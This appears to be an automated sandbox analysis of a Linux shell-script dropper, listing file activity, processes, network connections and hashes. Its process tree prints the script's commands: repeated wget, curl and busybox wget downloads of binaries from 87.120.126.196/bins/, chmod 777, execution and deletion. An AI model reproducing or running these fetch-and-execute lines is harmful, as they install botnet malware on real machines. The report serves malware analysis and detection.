File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /usr/bin/curl N/A
File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /usr/bin/curl N/A
File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /usr/bin/curl N/A
File opened for modification /tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw /usr/bin/curl N/A
File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /usr/bin/curl N/A
File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /usr/bin/curl N/A
File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /usr/bin/curl N/A
File opened for modification /tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k /usr/bin/curl N/A
File opened for modification /tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck /usr/bin/curl N/A
File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /usr/bin/curl N/A
File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /usr/bin/curl N/A
File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /usr/bin/curl N/A
File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /usr/bin/curl N/A
File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /usr/bin/curl N/A
File opened for modification /tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY /usr/bin/curl N/A
File opened for modification /tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i /usr/bin/curl N/A
File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /usr/bin/curl N/A
File opened for modification /tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv /usr/bin/curl N/A
File opened for modification /tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah /usr/bin/curl N/A
File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /usr/bin/curl N/A
File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /usr/bin/curl N/A
File opened for modification /tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm /usr/bin/curl N/A
File opened for modification /tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA /usr/bin/curl N/A
File opened for modification /tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2 /usr/bin/curl N/A
File opened for modification /tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG /usr/bin/curl N/A
File opened for modification /tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb /usr/bin/curl N/A
File opened for modification /tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp /usr/bin/curl N/A
File opened for modification /tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613 /usr/bin/curl N/A

Processes

/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh

[/tmp/c2023304dbd5db2b900e527622714d277b218d0aff1fc1dcb1cff60cb8dbdc6b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/chmod

[chmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

[./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/rm

[rm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/chmod

[chmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm

[./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/rm

[rm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/wget

[wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/chmod

[chmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA

[./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/rm

[rm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/wget

[wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/chmod

[chmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw

[./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/rm

[rm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/wget

[wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/chmod

[chmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb

[./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/rm

[rm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/wget

[wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/chmod

[chmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k

[./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/rm

[rm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/chmod

[chmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613

[./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/rm

[rm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/wget

[wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/chmod

[chmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp

[./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/rm

[rm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/wget

[wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/chmod

[chmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2

[./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/rm

[rm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/wget

[wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/chmod

[chmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY

[./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/rm

[rm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/wget

[wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/chmod

[chmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck

[./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/rm

[rm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/wget

[wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/chmod

[chmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG

[./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/rm

[rm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/wget

[wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/chmod

[chmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv

[./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/rm

[rm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/wget

[wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/chmod

[chmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah

[./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/rm

[rm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/wget

[wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/chmod

[chmod 777 tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/tmp/tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2

[./tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/bin/rm

[rm tNxUSt5NhlC5kARq7gvBflueyJlKvkI8O2]

/usr/bin/wget

[wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/chmod

[chmod 777 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/tmp/6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY

[./6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/bin/rm

[rm 6qTzOzmb3L6ewqukpUhPIcAyYefCw8JTOY]

/usr/bin/wget

[wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/chmod

[chmod 777 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/tmp/7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck

[./7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/bin/rm

[rm 7xa0XQLsb9yqlgWs6ukgyy1ccWyq9674Ck]

/usr/bin/wget

[wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/chmod

[chmod 777 SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/tmp/SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG

[./SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/bin/rm

[rm SYEXOFGkOSMMJY72vpBE4knhEbz9F8R8lG]

/usr/bin/wget

[wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/chmod

[chmod 777 tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/tmp/tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv

[./tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/bin/rm

[rm tZgRyT8CBJsJtAGBs2FKxe54cY3ExQElFv]

/usr/bin/wget

[wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/chmod

[chmod 777 KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/tmp/KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah

[./KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/bin/rm

[rm KiF7nAtQgz8eH47SyrU5i2tM9MoHoikmah]

/usr/bin/wget

[wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/chmod

[chmod 777 RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

[./RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/bin/rm

[rm RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/chmod

[chmod 777 Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/tmp/Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm

[./Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/bin/rm

[rm Xok7bjctdY8YttSEEDnxwoxpgcX4tB6XHm]

/usr/bin/wget

[wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/chmod

[chmod 777 CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/tmp/CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA

[./CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/bin/rm

[rm CPPlc3Yzj8M2YktAvSEsKF5zPwSOKt0BfA]

/usr/bin/wget

[wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/chmod

[chmod 777 oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/tmp/oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw

[./oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/bin/rm

[rm oxUWvwhZOEoMoCgfzN0z8gldLt09ELl7Cw]

/usr/bin/wget

[wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/chmod

[chmod 777 OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/tmp/OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb

[./OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/bin/rm

[rm OFYM3t3OdXEMZlp13fUl8vLz1Xy4Ybx5cb]

/usr/bin/wget

[wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/chmod

[chmod 777 aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/tmp/aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k

[./aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/bin/rm

[rm aUFzTJBbmAYbPv9lME6JtPK1PKi4P2CT4k]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/chmod

[chmod 777 Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/tmp/Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613

[./Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/bin/rm

[rm Ju8QBqA692Dp6a71dtDveu17PKqH4EQ613]

/usr/bin/wget

[wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/chmod

[chmod 777 HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/tmp/HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp

[./HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

/bin/rm

[rm HUV3uYejTB3G9yxm9AsJMvbGhfnIhIzLGp]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/RyYfb1MF7l6K3p9GTwT5pnNmx1VEBJ2D8i

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97